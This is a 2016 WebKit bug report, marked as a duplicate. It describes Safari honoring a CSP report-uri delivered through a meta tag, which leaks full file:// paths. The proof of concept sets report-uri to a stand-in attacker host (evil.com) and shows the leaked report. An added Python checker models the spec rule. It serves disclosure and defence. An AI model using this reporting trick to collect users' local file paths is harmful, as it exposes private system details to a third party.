Bug 158263 - CSP: report-uri is honored even if CSP is served via <meta> tag, leaking full file:// paths as document-uri
Status: RESOLVED DUPLICATE of bug 154307
Alias: None
Product: WebKit
Classification: Unclassified
Component: WebCore Misc.
Version: WebKit Local Build
Hardware: Unspecified OS X 10.11
Importance: P2 Normal
Assignee: Nobody
Reported: 2016-06-01 09:03 PDT by Michele Spagnuolo
Modified: 2016-06-01 20:24 PDT
Description Michele Spagnuolo 2016-06-01 09:03:39 PDT
Safari leaks the full file:// path in document-uri if a report-uri is in a CSP served via a <meta> tag, even though the specification explicitly prohibits honoring report-uri if the policy is served via a <meta> tag[1].

PoC:

report-uri.html
----------------

<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="Content-Security-Policy" content="img-src 'none'; report-uri https://evil.com/csp">
    <title>CSP report-uri demo</title>
  </head>
  <body>
    <img src="cat.jpg" alt="A nice cat">
  </body>
</html>

This is the report sent to a remote report-uri:

{"csp-report":{"document-uri":"file:///Users/mikispag/CSP/report-uri.html","referrer":"","violated-directive":"img-src 'none'","original-policy":"img-src 'none'; report-uri https://evil.com/csp","blocked-uri":"file"}}

[1] https://www.w3.org/TR/CSP2/#directive-report-uri
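Added example, not part of the original report and not WebKit code: a small checker that applies the CSP2 rule for <meta>-delivered policies (report-uri, frame-ancestors and sandbox are ignored) to the PoC document above and shows which policy should actually be enforced. The names META_IGNORED, parse_policy, MetaCSPCollector and effective_meta_policies are hypothetical.

```python
from html.parser import HTMLParser

# Directives that CSP2 says are ignored when a policy is delivered via <meta>.
META_IGNORED = {"report-uri", "frame-ancestors", "sandbox"}
# The PoC document from the report above.
POC = """<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="Content-Security-Policy" content="img-src 'none'; report-uri https://evil.com/csp">
    <title>CSP report-uri demo</title>
  </head>
  <body>
    <img src="cat.jpg" alt="A nice cat">
  </body>
</html>"""

def parse_policy(policy):
    """Split a serialized policy into (name, value) pairs; duplicates are dropped."""
    seen, directives = set(), []
    for token in policy.split(";"):
        parts = token.strip().split(None, 1)
        if not parts or parts[0].lower() in seen:
            continue  # empty token, or a repeated directive (first one wins)
        seen.add(parts[0].lower())
        directives.append((parts[0].lower(), parts[1].strip() if len(parts) > 1 else ""))
    return directives

class MetaCSPCollector(HTMLParser):
    """Collects the content attribute of every <meta http-equiv=Content-Security-Policy>."""
    def __init__(self):
        super().__init__()
        self.policies = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "meta" and (attrs.get("http-equiv") or "").strip().lower() == "content-security-policy":
            self.policies.append(attrs.get("content") or "")

def effective_meta_policies(html):
    """Return one (enforced_policy, ignored_directives) tuple per <meta> policy."""
    collector = MetaCSPCollector()
    collector.feed(html)
    results = []
    for policy in collector.policies:
        parsed = parse_policy(policy)
        kept = [f"{n} {v}".strip() for n, v in parsed if n not in META_IGNORED]
        ignored = [(n, v) for n, v in parsed if n in META_IGNORED]
        results.append(("; ".join(kept), ignored))
    return results
```

For the PoC, the enforced policy is only img-src 'none' and report-uri lands in the ignored list, so a conforming user agent blocks cat.jpg without sending any report.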
Comment 1 Daniel Bates 2016-06-01 20:18:44 PDT

*** This bug has been marked as a duplicate of bug 154307 ***
Comment 2 Daniel Bates 2016-06-01 20:24:24 PDT
Out of curiosity, what version of Safari are you using? You can find the version of Safari in Safari > About Safari.